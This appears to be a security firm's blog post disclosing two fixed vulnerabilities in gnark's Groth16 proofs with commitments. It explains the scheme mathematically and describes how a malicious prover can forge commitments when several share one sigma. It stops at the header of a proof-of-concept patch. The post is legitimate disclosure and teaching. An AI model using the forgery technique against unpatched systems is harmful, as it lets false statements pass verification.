Malte Leip

September 6, 2024

Two Vulnerabilities in gnark's Groth16 Proofs

An analysis of two vulnerabilities Zellic discovered that broke zero-knowledge and soundness of gnark’s Groth16 proofs with commitments

gnark↗ is a popular zkSNARK library written in Go. One of two proving schemes offered by the gnark backend is a variant of the Groth16 scheme. This variant used by gnark is a modification of standard Groth16, extending it with commitments. In this article, we discuss two vulnerabilities that we found in this extension. The first breaks soundness and could allow a malicious prover to prove incorrect statements, whenever at least two commitments are used (CVE-2024-45039↗). The second breaks the zero-knowledge property of Groth16 proofs produced by gnark using commitments (CVE-2024-45040↗). In some cases, an attacker could use this vulnerability to recover private witnesses from a proof. We reported both vulnerabilities to the gnark team, and they have been fixed in version 0.11.0↗. Unless otherwise stated, the discussion below is based on gnark version 0.10.0.

This article will begin in the first two sections by introducing gnark and fixing notation as well as recalling the main components of the Groth16 proving system. In the third section, we then motivate and describe gnark’s extension to Groth16 involving commitments. Building from there, the fourth section explains the first of two vulnerabilities, the soundness one. Before explaining the second vulnerability in the sixth section, we take a step back and discuss commitment schemes and their security properties, particularly for Pedersen commitments. We provide some background on how we found the vulnerabilities as well as a timeline at the end.

What Is gnark?

In this section, we will introduce gnark and its components via an example, assuming the reader already has basic familiarity with what zero-knowledge proofs are. (If you need an introduction to that first, check out our earlier blog post on an introduction to zero-knowledge.)

Circuit Variables and Constraints

There are several parts involved in producing ZK proofs. The very first step is to define what it is we would like to prove. As an example, let us say we want to prove that a public natural number $N$ is not prime. Even more, we would like to prove that we actually know $1 < A, B$ so that $N = A\cdot B$ . Given this specification, we then need to define a circuit consisting of circuit variables that could be private witnesses or public instances, together with constraints that these circuit variables need to satisfy. Defining a circuit like this is functionality offered by gnark’s front end. Here is how this could look for our example so far:

// Here we define which circuit variables our circuit will have.
type ExampleCircuit struct {
	A frontend.Variable // Private witness
	B frontend.Variable // Private witness
	N frontend.Variable `gnark:",public"` // Public instance
}

// This function defines the constraints for our circuit
func (circuit *ExampleCircuit) Define(api frontend.API) error {
	api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B
	api.AssertIsDifferent(circuit.A, 0)                         // A != 0
	api.AssertIsDifferent(circuit.A, 1)                         // A != 1
	api.AssertIsDifferent(circuit.B, 0)                         // B != 0
	api.AssertIsDifferent(circuit.B, 1)                         // B != 1
	return nil
}

We first defined three circuit variables $A$ , $B$ , and $N$ , making $N$ public. By default, circuit variables in gnark are private witnesses. The function Define is then used to introduce constraints. In this case, we constrained $N = A \cdot B$ as well as ruled out that $A$ or $B$ were 0 or 1.

Arithmetic Modulo $p$

This is not enough to actually ensure our statement, however. While in our original statement $N$ , $A$ , and $B$ were natural numbers, in the circuit we are actually working with elements of a prime field, so integers modulo a prime $p$ . The constraint we introduced only ensures that $N$ and $A\cdot B$ have the same remainder when reduced modulo $p$ . So how do we deal with that? One way would be to constrain $A$ and $B$ to be small enough that their product can never be as large as $p$ . For example, if we only plan to use this circuit for $N$ , which is at most a 16-bit number, then correct $A$ and $B$ will also be at most 16 bits wide. The $p$ we will later use will be a 254-bit number, so constraining $A$ and $B$ to be at most 16 bits wide will ensure that no wraparound can happen on multiplication.

Range Checks

So how do we actually constrain $A$ and $B$ to be at most 16 bits wide? Checks like this are called range checks and are very common when writing circuits. Because of this, gnark’s standard library already contains an optimized implementation of range checks already, which we can use without needing to implement the logic for this ourselves:

const bitnum = 8

// This function defines the constraints for our circuit
func (circuit *ExampleCircuit) Define(api frontend.API) error {
	api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B
	api.AssertIsDifferent(circuit.A, 0)                         // A != 0
	api.AssertIsDifferent(circuit.A, 1)                         // A != 1
	api.AssertIsDifferent(circuit.B, 0)                         // B != 0
	api.AssertIsDifferent(circuit.B, 1)                         // B != 1
	rangeChecker := rangecheck.New(api)
	rangeChecker.Check(circuit.A, bitnum) // 0 <= A < 2^bitnum
	rangeChecker.Check(circuit.B, bitnum) // 0 <= B < 2^bitnum
	return nil
}

Proving Scheme

If we want to use gnark to produce proofs for this circuit, we first need to decide on the proving scheme and elliptic curve we would like to use. There are two proving schemes available: PlonK and (a variant of) Groth16. In this article, we only consider Groth16. There are also multiple curves available, and we choose the BN254 curve in our examples.

Running Setup, Prover, and Verifier

Before we can produce an actual Groth16 proof for the above circuit, we must first run the setup, producing a proving key and verification key. The proving key will then be used by the prover along the public instances and private witnesses to produce the proof, and the verfication key will be used by the verifier together with the public instances and the proof to verify whether the proof is valid. The code for this looks as follows:

func main() {
	// Compiles our circuit into a R1CS constraint system
	var circuit ExampleCircuit
	ccs, _ := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circuit)

	// Groth16 setup, generating the proving key and verification key
	pk, vk, _ := groth16.Setup(ccs)

	// Witness definition
	assignment := ExampleCircuit{A: 3, B: 10, N: 30}
	witness, _ := frontend.NewWitness(&assignment, ecc.BN254.ScalarField())
	publicInstances, _ := witness.Public()

	// Proving
	proof, _ := groth16.Prove(ccs, pk, witness)

	// Verifying
	groth16.Verify(proof, vk, publicInstances)
}

If we run this, we will get output like the following, showing the proof was successfully produced and verified:

32:11 INF compiling circuit
32:11 INF parsed circuit inputs nbPublic=1 nbSecret=2
32:11 INF building constraint builder nbConstraints=29
32:11 DBG constraint system solver done nbConstraints=29 took=0.698133
32:11 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=29 took=2.139242
32:11 DBG verifier done backend=groth16 curve=bn254 took=3.499106

The Zero-Knowledge Property

The zero-knowledge property means in this example that knowing only the public instance $N$ and the proof (as well as the verification and proving keys), it should be impossible to recover any knowledge about $A$ and $B$ apart from what is constrained in the circuit. In the example $N=30$ , there are six nontrivial divisors of $N$ , namely $2,3,5,6,10$ , and $15$ . Possibilities for $(A, B)$ are thus $(2, 15), (3, 10), (5, 6), (6, 5), (10, 3)$ , and $(15, 2)$ . There should be no way to check which of these the prover actually used. As we will later see, a vulnerability in the extension to Groth16 that was used by gnark meant that this was violated and it was in fact possible to recover what $A$ and $B$ were (up to version 0.10.0, fixed in version 0.11.0).

Groth16 Proofs

Before we can discuss gnark’s extension to Groth16, we first briefly review how proofs for the original variant of Groth16 are constructed and verified. The Groth16 proving system was introduced in the paper “On the Size of Pairing-based Non-interactive Arguments↗” by Jens Groth, and the following summary closely follows section 3.2 of that paper.

For readers already familiar with the Groth16 proving system, the purpose of this section is mainly to fix notation and provide the relevant formulas that we will use throught the article for reference. For readers that are not familiar with the details of Groth16, the main takeaways are the following:

The circuit variables are $a_1, \dots, a_m$ , with $a_1,\dots, a_\ell$ the public inputs, and $a_{\ell+1}, \dots, a_m$ private witnesses.
Out of the constraints of the circuit, a black-box setup process spits out a bunch of elliptic curve points that we give names like $L_i$ or $\alpha$ . A list can be found in the table below.
A proof consists of three elliptic curve points $A$ , $B'$ , and $C$ , and there are formulas for how they are to be calculated by the prover from the points obtained from the setup step and from some $h_i$ that we treat as a black box for the purpose of this article. Why the formulas for these three points look the way they do is not relevant for this article, but we state the formulas because we will modify them later, when discussing gnark’s extension.
There is an equation, given in the “Verifying” section below, that is checked by the verifier. The verifier accepts a proof if and only if the equation holds. Again, why this equation looks the way it does can be taken as given, but we state the equation as it will be modified later.
Soundness of the Groth16 proving system means that if this equation holds, then the prover must have known witnesses satisfying the circuit constraints.

Setup

There are three main parts that together make up the Groth16 proving system: the setup, the prover, and the verifier. The setup depends on the circuit and produces a proving key and a verifying key, where the former is used by the prover together with an assignement for the circuit variables to produce a proof, and the latter is used by the verifier together with the public instances to check validity of a proof.

The table below describes the data that make up the proving and verifying keys. We give both the notation used in the Groth16 paper as well as the notation used in the gnark source code. We also fix notation we will use below. In the group column, we specify which group the element is an element of, either $\mathbb{G}_1$ or $\mathbb{G}_2$ . Those two abelian groups are subgroups of elliptic curves and come together with a suitable pairing $e\colon\mathbb{G}_1 \times \mathbb{G}_2 \to \mathbb{G}_T$ . For readers who would like an introduction, we have an earlier article introducing what elliptic curve pairings are. The precise ranges for $i$ in the various rows, how $u_i, v_i, w_i$ relate to the circuit, and so on is not relevant for our exposition, so we will not go into those questions. The interested reader can find the details in the Groth16 paper. The constant $\ell$ stands for the number of public instances. The notation $\left[x\right]_k$ refers to $x\cdot G_k$ , where $x$ is an element of the scalar field and $G_k$ is a fixed generator for $\mathbb{G}_k$ .

	Group	Notation in this article	Notation in gnark	Notation in Groth16
Proving key	$\mathbb{G}_1$	$\overline{\alpha} = \left[\alpha\right]_1$	`G1.Alpha`	$\left[\alpha\right]_1$
		$\overline{\beta} = \left[\beta\right]_1$	`G1.Beta`	$\left[\beta\right]_1$
		$\overline{\delta} = \left[\delta\right]_1$	`G1.Delta`	$\left[\delta\right]_1$
		$A_i$	`G1.A[i]`	$\left[u_i(x)\right]_1$
		$B_i$	`G1.B[i]`	$\left[v_i(x)\right]_1$
		$Z_i$	`G1.Z[i]`	$\left[\frac{x^i t(x)}{\delta}\right]_1$
		$K_{i+\ell+1}$	`G1.K[i]`	$\left[\frac{\beta u_{i+\ell+1}(x) + \alpha v_{i+\ell+1}(x) + w_{i+\ell+1}(x)}{\delta}\right]_1$
	$\mathbb{G}_2$	$\overline{\beta}' = \left[\beta\right]_2$	`G2.Beta`	$\left[\beta\right]_2$
		$\overline{\delta}' = \left[\delta\right]_2$	`G2.Delta`	$\left[\delta\right]_2$
		$B'_i$	`G2.B[i]`	$\left[v_i(x)\right]_2$
Verifying key	$\mathbb{G}_1$	$\overline{\alpha} = \left[\alpha\right]_1$	`G1.Alpha`	$\left[\alpha\right]_1$
		$\overline{\beta} = \left[\beta\right]_1$	`G1.Beta`	$\left[\beta\right]_1$
		$\overline{\delta} = \left[\delta\right]_1$	`G1.Delta`	$\left[\delta\right]_1$
		$L_i$	`G1.K[i]`	$\left[\frac{\beta u_{i}(x) + \alpha v_{i}(x) + w_{i}(x)}{\gamma}\right]_1$
	$\mathbb{G}_2$	$\overline{\beta}' = \left[\beta\right]_2$	`G2.Beta`	$\left[\beta\right]_2$
		$\overline{\delta}' = \left[\delta\right]_2$	`G2.Delta`	$\left[\delta\right]_2$
		$\overline{\gamma}' = \left[\gamma\right]_2$	`G2.Gamma`	$\left[\gamma\right]_2$

Proving

The prover takes as input the proving key and an assignment for the circuit variables $\left(a_1, \dots, a_m\right)$ . Here, $a_1$ through $a_\ell$ are the public instances and $a_{\ell+1}$ through $a_{m}$ are the private witnesses. To simplify notation, we also set $a_0=1$ .

The prover then calculates three group elements (two of $\mathbb{G}_1$ and one of $\mathbb{G}_2$ ), which jointly make up the proof. Below we again compare notation for the elements that make up the proof.

Group	Notation in this article	Notation in gnark	Notation in Groth16
$\mathbb{G}_1$	$A$	`Ar`	$\left[A\right]_1$
$\mathbb{G}_2$	$B'$	`Bs`	$\left[B\right]_1$
$\mathbb{G}_1$	$C$	`Krs`	$\left[C\right]_1$

To calculate $A$ , $B'$ , and $C$ , the prover will first sample random elements $r$ and $s$ of the scalar field and calculate certain elements $h_i$ . (The details of this are not relevant for this article.) The proof points are then obtained as follows ( $n$ can be thought of as the number of constraints in the circuit).

\begin{align*} A &= \overline{\alpha} + \sum_{i=0}^{m} a_i \cdot A_i + r\cdot \overline{\delta} \\ B &= \overline{\beta} + \sum_{i=0}^{m} a_i \cdot B_i + s\cdot \overline{\delta} \\ B' &= \overline{\beta}' + \sum_{i=0}^{m} a_i \cdot B'_i + s\cdot \overline{\delta}' \\ C &= \sum_{i=\ell + 1}^{m} a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \end{align*}

Verifying

To verify a proof $\left(A, B', C\right)$ for public instances $\left(a_1, \dots, a_\ell\right)$ , the verifier checks whether the following equality holds.

\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C, \overline{\delta}'\right) \end{equation*}

gnark’s Extension to Groth16 Proofs

In this section, we will motivate and discuss the extension to Groth16 that is used by gnark.

Random Linear Combinations and the Schwartz-Zippel Lemma

To motivate the extension, let us first take a step back and consider a generic problem. In many situations where a prover wants to convince a verifier of some statements, this involves claims that a number of equalities $f_i = g_i$ hold ( $f_i$ and $g_i$ are elements of some finite field $\mathbb{F}_p$ and $0 \leq i < k$ ). One way to check all equations at once is checking a random linear combination instead. If $r_i$ are random elements of $\mathbb{F}_p$ , then $f_i = g_i$ for all $i$ implies that $\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i$ . On the other hand, if there is a $j$ such that $x_j \neq y_j$ , then only one in $p$ of tuples $\left(r_1, \dots, r_n\right)$ will satisfy $\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i$ .¹ Thus, as long as the values $r_i$ are chosen uniformly random and independently of $f_i$ and $g_i$ , the equality $\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i$ can be taken to be very strong evidence that $f_i = g_i$ for all $i$ .

In some situations, calculating the sums on both sides might be cheap, but each equality check is expensive, so paying for the reduction from $n$ to only a single equality check with the calculation of the two linear combinations can be an improvement.

A variant of the above method is often used in practice. We can interpret the elements $f_i$ and $g_i$ as the coefficients of polynomials $f$ and $g$ of degree $k$ . What we would like to show is that $f = g$ , or equivalently $f-g = 0$ . As $f-g$ is a polynomial of degree at most $k$ , it must either be the zero polynomial or have at most $k$ different roots. The probability of a random element $\tau$ being a root of $f-g$ , assuming that $f-g \neq 0$ , is thus at most $k / p$ , so tiny if $p$ is large compared to $k$ . This statement (generalized to the multivariate case) is known as the Schwartz-Zippel lemma. The upshot is that if $f$ and $g$ evaluate to the same element on a random input $\tau$ , then this can be taken as strong evidence for $f=g$ . This is similar to the random linear combination check we discussed before, now using $r_i = \tau^i$ .

Note that if $\tau$ can be chosen by the prover, then they could just calculate a root of $f-g$ , so this would be insecure. Similarly, if $\tau$ is chosen randomly by the verifier, but the prover knows of $\tau$ before deciding on $f_i$ and $g_i$ , they could cheat by, for example, setting $f_0 = \sum_{i=0}^{k-1} g_i \cdot \tau^i - \sum_{i=1}^{k-1} f_i \cdot \tau^i$ .

The discussed technique is very widely used, and in fact, the Groth16 proof scheme itself uses it. Looking at the “Notation in Groth16” column in the table for the verification and proving keys above, $x$ plays the role of the random input, and $u_i$ and so on are polynomials related to the circuit’s constraints, which get evaluated at $x$ in order to construct the proving and verifying key. The proof essentially consists of points obtained by evaluating three polynomials at $x$ . The argument for why the verifiers’ single equality check implies all constraints is precisely the argument that a polynomial of low degree evaluating to zero at a random point $x$ implies with high probability that the polynomial was already zero.

In Groth16’s case, the value of $x$ is not allowed to be known to the prover, as otherwise the system would be insecure, as previously discussed. Thus, the necessary values derived from $x$ are essentially hidden behind the elliptic curve discrete logarithm problem. (Knowing, for example, $u_i(x) \cdot G_1$ and $G_1$ , with $G_1\in\mathbb{G}_1$ , it should be computationally infeasible to calculate $u_i(x)$ .) While $x$ might be present during the setup process to calculate the proving and verifying key, the value of $x$ is so-called toxic waste; it must be deleted to ensure no prover will know it. In practice, multiparty computation is used in the setup phase to ensure that no single party ever knows toxic-waste values such as $x$ .

Given this is such a useful technique in many places, we might want to use it within a circuit as well. However, we run into a problem here. How do we obtain a random value within the circuit at proving time? We certainly cannot let the prover choose it, as that would be insecure and we want a noninteractive protocol, so there is no other party that could supply it. One thing we could do is to obtain $\tau$ as a hash of $f_i$ and $g_i$ . Given a hash function that can be modeled as a random oracle, this would be secure as well. The malicious prover could now try again if the $\tau$ they got is not a root, but as the new $\tau$ obtained after modifying some $f_i$ and/or $g_i$ will be random and unrelated to previously seen values, the best they can do is brute-force.

This procedure allows us to use the technique of reducing checking many equalities to only checking one equality within circuits. However, we now have to compute a hash in circuit, which may be quite expensive itself. It would thus be very useful if a circuit variable could be somehow constrained to be a hash of some other circuit variables without actually having to add these constraints in circuit. This is exactly what the extension to Groth16 that is used by gnark does.

Splitting Out a Commitment

In order to have hashes of some circuit variables available in circuit, gnark allows to commit to collections of circuit variables. These commitments are elements of $\mathbb{G}_1$ , and a hash calculated from them is added as additional public inputs to the circuit. There can be more than one commitment, and each commitment can be to one or more circuit variables, both public instances and private witnesses. In the following, we will, however, just describe the case where only private witnesses are commited to, to simplify notation.

How to design such a system? Merely committing to some values is easy, and there are many schemes that can be used to commit to values, such as the Pedersen commitment scheme, which we will discuss later in this article. So the prover could just, in addition to the normal Groth16 proof, also provide some commitments to some values. However, we do not want a Groth16 proof together with some unrelated commitments — we want the committed values to be the same values as the ones assigned to the circuit variables in the Groth16 proof. So there must be some linkage between the commitments and the (verification of) the Groth16 proof. This leads to the idea of starting by splitting off from one of the proof points of the summands concerning the circuit variables that are to be committed. This split-off point is then used as the commitment. But this point will also still need to be used in the verification equation, thereby linking it to the rest of the Groth16 proof.

Concretely, in the gnark extension, the commitment is removed from the $C$ proof point. This new point will then fill in for the missing part of $C$ in the proof verification. But as it is split off as a separate element, it can be used as input for hashing so that the verifier can compute that additional public input made up of the hashed commitment.

We will keep notation from before, so $\left(a_1, \dots, a_m\right)$ are the circuit variables, where $a_{\ell+1}$ through $a_m$ are the private witnesses. We assume we want to make $k$ -many commitments to pairwise disjoint subsets of the the private witnesses. For this, we introduce indexing sets $\mathcal{J}_1, \dots, \mathcal{J}_k \subseteq \{\ell + 1, \dots, m\}$ . So the $i$ -th commitment should commit to circuit variables $a_{j}$ for $j\in \mathcal{J}_i$ . We also introduce notation for the set of indexes of all committed circuit variables $\mathcal{J} \coloneqq \bigcup\limits_{i=1}^{k} \mathcal{J}_i$ . What we can now do is replace the proof point $C$ from vanilla Groth16 (we will call the value this point has in vanilla Groth16 by $C_{\mathrm{old}}$ below for clarity) by a modified $C_{\mathrm{new}}$ and add new points $D_1, \dots, D_k$ for the commitments.

\begin{align*} C_{\mathrm{old}} &= \sum_{i \in \{\ell+1, \dots, m\} } a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \\ C_{\mathrm{new}} &= \sum_{i \in \{\ell+1, \dots, m\} \setminus \mathcal{J} } a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \\ D_i &= \sum_{j \in \mathcal{J}_i } a_j\cdot K_j \end{align*}

Then the verifier can add the sum of the $D_i$ to $C$ when checking the proof, so instead of

\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{old}}, \overline{\delta}'\right) \end{equation*}

the check will be

\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{new}} + \sum_{i=1}^k D_i, \overline{\delta}'\right) \end{equation*}

Now we have points $D_i$ available that depend on the circuit variables committed to for the $i$ -th commitment. But the goal we outlined initially was that we wanted to have in-circuit challenges depending on those committed circuit variables, so we need one more step. Let $\mathcal{H}$ be a hash function that maps points of $\mathbb{G}_1$ to $\mathbb{F}_p$ . We can then use $\mathcal{H}$ to convert the commitment points to elements of $\mathbb{F}_p$ , which we then use as public inputs to the circuit:

\begin{equation*} a_{\ell-k-1+i} \coloneqq \mathcal{H}(D_i) \end{equation*}

Now these circuit variables $a_{\ell-k-1+i}$ can be used in circuit as challenges that depend on the circuit variables committed to with $D_i$ , for example in Schwartz-Zippel–style equality checks, as discussed above.

As is, there would be a big problem for this scheme, however: the verification does not depend on $C_{\mathrm{new}}$ and all $D_i$ individually, only on the sum $C_{\mathrm{new}} + \sum_{i=1}^k D_i$ . A malicious prover could thus just replace the honest $D_i$ by arbitrarily chosen $D_i^{\mathrm{fake}}$ by setting $C_{\mathrm{new}}^{\mathrm{fake}} = C_{\mathrm{new}} + \sum_{i=1}^k D_i - \sum_{i=1}^k D_i^{\mathrm{fake}}$ .

Preventing Fungibility of the Commitments Using Separate Proofs of Knowledge

So how could one prevent the kind of fungibility of the commitments that we just discussed?

The approach to this is to make the prover supply a proof of knowledge of coefficients $a_j$ for $j \in \mathcal{J}_i$ so that $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot K_j$ . This would ensure that $D_i$ is not fully arbitrary but was constructed as a linear combination of the expected points. (We will explain later how such a proof of knowledge would look like.) This helps but isn’t enough; a malicious prover could still, for example, use $D_i=0$ by just adding the relevant summands that should appear in the legitimate $D_i$ to $C_{\mathrm{new}}$ instead. So we will also have to require a proof of knowledge of relevant coefficients for $C_{\mathrm{new}}$ , ensuring that $C_{\mathrm{new}}$ was constructed as a linear combination of only the expected elliptic curve points.

There is one optimization that we can do here to only need proofs of knowledge for $D_i$ . Instead of pairing $D_i$ with $\overline{\delta}'$ , grouping it with $C_{\mathrm{new}}$ , we could pair $D$ with $\overline{\gamma}'$ , so grouping it with $\sum_{i=0}^{\ell} a_i \cdot L_i$ . In this case, we do not need a proof of knowledge associated with $\sum_{i=0}^{\ell} a_i \cdot L_i$ for being of this form, because it is the verifier itself that computes this linear combination, and so by construction, it will be a linear combination of only points $L_i$ with $0 \leq i \leq \ell$ . So we save one proof of knowledge. For this, we must slightly adjust $D_i$ , however, so that we will have the following:

\begin{align*} D_i &= \frac{\delta}{\gamma} \cdot \left(\sum_{j \in \mathcal{J}_i } a_j\cdot K_j\right) = \sum_{j \in \mathcal{J}_i } a_j\cdot \left(\frac{\delta}{\gamma} \cdot K_j\right) \end{align*}

The prover should not know $\delta$ , $\gamma$ , or $\frac{\delta}{\gamma}$ of course, so the points $\frac{\delta}{\gamma} \cdot K_i$ will be part of the proving key. We actually already have notation that we can use for $\frac{\delta}{\gamma} \cdot K_i$ , namely $L_i$ . In a vanilla Groth16 proving key, $L_i$ does not appear, and the verification key has $L_j$ for $0 \leq j \leq \ell$ . However, the formula for $L_i$ is precisely what $\frac{\delta}{\gamma} \cdot K_i$ is for $i > \ell$ . Hence we can write $D_i$ as follows:

\begin{align*} D_i &= \sum_{j \in \mathcal{J}_i } a_j\cdot L_j \end{align*}

The verifier will now add $D_i$ to the term from the public input when checking the proof, so it will check that

\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=1}^k D_i + \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{new}}, \overline{\delta}'\right) \end{equation*}

Assuming the protocol also includes proofs of knowledge for all $D_i$ as mentioned before, showing that the resulting protocol is sound likely boils down to an argument similar to Theorem 1 of the Groth16 paper↗.

The extension used by gnark uses this solution. One of the two vulnerabilities we report on in this article relates to the way that the proofs of knowledge were batched, and we will explain how the proofs of knowledge coming with $D_i$ work in the next section, where we will also explain the vulnerability.

The Soundness Vulnerability

In this section, we discuss the soundness vulnerability present in gnark up to version 0.10.0 in cases where more than one commitment is used. We will begin by explaining how proofs of knowledge associated to an individual commitment would look like, then explain how they can be batched, and finally discuss the even more compressed batched verification used by gnark up to version 0.10.0 that however resulted in a vulnerability.

Proofs of Knowledge of Coefficients of a Linear Combination

As explained before, we must require the prover to supply together with $D_i$ a proof of knowledge of coefficients $(a_j)_{j\in\mathcal{J}_i}$ such that $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$ . Such a proof of knowledge must be provided for $1 \leq i \leq k$ . We will start by fixing $i$ and discuss how to construct a single such proof of knowledge.

This can be done as follows. During the setup phase, an additional toxic-waste field element $\sigma_i$ is sampled, and $\sigma_i\cdot L_j$ is added to the proving key for $j\in\mathcal{J}_i$ . Furthermore, $[\sigma_i]_2 \in \mathbb{G}_2$ is added to the verification key. The prover now provides together with $D_i$ also a point $P_i$ of $\mathbb{G}_1$ , calculated as $P_i = \sum_{j \in \mathcal{J}_i } a_j\cdot (\sigma_i \cdot L_j)$ . The verifier carries out the following check:

\begin{equation*} e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(P_i, [1]_2\right) \end{equation*}

Why should the above equality coinvince the verifier that $D_i$ is of the form $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$ ? The idea is that the malicious prover could only have arranged this equality to hold if $P_i = \sigma_i \cdot D_i$ , but as they do not know $\sigma_i$ , the only way they could have managed this is by calculating $D_i$ as a linear combination of points for which mulitplication by the scalar $\sigma_i$ is already known. But the only points of that form are $L_j$ for $j\in\mathcal{J}_i$ .

Batching the Proofs of Knowledge

In the previous subsection, we discussed the kind of proof of knowledge needed for each commitment. Each of the verifications requires two pairings, which are quite expensive, however. So it would be good if verification of $k$ such proofs of knowledge could be done in fewer pairings than $2\cdot k$ many.

This is actually exactly the kind of situation we discussed initially in this article when motivating why in-circuit random challenges and hence commitments are useful: to be able to use Schwartz-Zippel–style compressed equality checks. This is precisely one example where the equality check is expensive, as it involves computing pairings.

Compressing this check in Schwartz-Zippel style thus begins by generating a random challenge $r\in\mathbb{F}_p$ . As this happens on the side of the verifier, they can just use a random number generator for this, if one is available. In contexts where the verifier can not use randomness, one may use $r=\mathcal{H}(D_1,\dots, D_k, P_1, \dots, P_k)$ . Then instead of verifying

\begin{equation*} e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(P_i, [1]_2\right) \text{ for } 1 \leq i \leq k \end{equation*}

the verifier can instead verify

\begin{equation*} \sum_{i=1}^k r^{k-1}e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} \sum_{i=1}^k r^{k-1} e\left(P_i, [1]_2\right) \end{equation*}

So far nothing is won, as this still involves $2\cdot k$ pairings. However, the right-hand side can be rewritten to be calculated with a single pairing, using bilinearity of $e$ , which makes $e\left(\_, [1]_2\right)$ linear.

\begin{equation*} \sum_{i=1}^k r^{k-1} e\left(P_i, [1]_2\right) = e\left(\sum_{i=1}^k r^{k-1}P_i, [1]_2\right) \end{equation*}

The upshot is that the verifier may verify the proofs of knowledge $P_1, \dots, P_k$ by checking the following equality.

\begin{equation*} \sum_{i=1}^k r^{k-1}e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(\sum_{i=1}^k r^{k-1}P_i, [1]_2\right) \end{equation*}

This requires $k+1$ pairings.

Proofs of Knowledge for Commitments in gnark up to Version 0.10.0

To compress the equality check we just arrived at further, one would also like to use bilnearity on the left-hand side to move the sum into the inputs to the pairing, similarly to how it was done for the right-hand side. However, this is not possible, as neither of the two inputs is held constant across the sum, unless $\sigma_i$ is independent of $i$ .

Up to version 0.10.0, gnark thus in fact used the same $\sigma_i = \sigma$ for each of the proofs of knowledge associated to the commitments. This meant that the verification could be compressed further, so that only two pairings were required:

\begin{equation*} e\left(\sum_{i=1}^k r^{k-1} D_i, [\sigma]_2\right) \stackrel{?}{=} e\left(\sum_{i=1}^k r^{k-1}P_i, [1]_2\right) \end{equation*}

The Soundness Vulnerability: Fungibility of Commitments

However, there is an issue with choosing the same $\sigma$ for all the proofs of knowledge, as long as there is more than one. When we argued for why the check the verifier does should convince them that $D_i$ is of the form $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$ , we used that the only points of $\mathbb{G}_1$ for which the prover also knows their product with $\sigma_i$ were $L_j$ for $j \in \mathcal{J}_i$ . However, if $\sigma_1 = \cdots = \sigma_k$ , then $L_j$ is such a point for $j \in \bigcup\limits_{i=1}^{k}\mathcal{J}_i$ . Thus, the proofs of knowledge only convince the verifier that the prover knows $a_{l, j}$ so that $D_i = \sum_{l=1}^k \sum_{j \in \mathcal{J}_l } a_{l, j}\cdot L_j$ .

What does this mean in practice? Say there are $k$ commitments as usual, and the correctly computed points would be $D_1^{\mathrm{correct}}, \dots, D_k^{\mathrm{correct}}$ . Then the malicious prover could use $D_1^{\mathrm{fake}}, \dots, D_k^{\mathrm{fake}}$ as commitments, where, for example, all but one of them (say all but $D_k^{\mathrm{fake}}$ ) are set to $0 \in \mathbb{G}_1$ , with the remaining commitment carrying the contributions missing from the others as well (so $D_k^{\mathrm{fake}} = \sum_{i=1}^{k} D_i^{\mathrm{correct}}$ ). Now for $i<k$ , the challenge point $\mathcal{H}(D_i^{\mathrm{fake}})$ obtained in circuit from the commitment to circuit variables $a_j$ for $j\in \mathcal{J}_i$ does not actually depend on the assignments to any circuit variables anymore but stays fixed. But for most uses of such challenge points, such as when compressing checks using the Schwartz-Zippel lemma, the in-circuit logic will not be sound anymore if the challenge point is not obtained from a random function of the committed-to circuit variables.

We emphasize that this issue only occurs when more than one commitment is used. The most likely way a circuit uses commitments will be the range checks from the standard library, which can use them internally, should the backend support commitments. However, commitments for range checks are used via the multicommit package↗, which only creates a single commitment. Thus, circuits using commitments purely through range checks or otherwise through multicommit will not be vulnerable, as only a single commitment is used.

Proof of Concept

To demonstrate the issue that we just discussed, we produced a proof of concept. In it, we construct a cicuit with two private witnesses, to which we assign random values. We commit individually to both private witnesses, producing two commitments and in-circuit challenges $c_1$ and $c_2$ corresponding to those commitments. We use the fungibility between the commitments to produce a proof with $D_1^{\mathrm{fake}} = 0$ and $D_2^{\mathrm{fake}} = D_1^{\mathrm{correct}} + D_2^{\mathrm{correct}}$ . Like this, no matter what we assign to the two private witnesses, the first challenge $c_1$ will always be a constant, the hash of the zero point.

As the commitments are calculated in the gnark library (rather than being passed to it as an argument), we need to patch the prover part of gnark to produce our malicious proofs. This is done with the following patch, based on version 0.10.0:

diff --git a/backend/groth16/bn254/prove.go b/backend/groth16/bn254/prove.go
index 100f30e8..1cf93b96 100644
--- a/backend/groth16/bn254/prove.go
+++ b/backend/groth16/bn254/prove.go
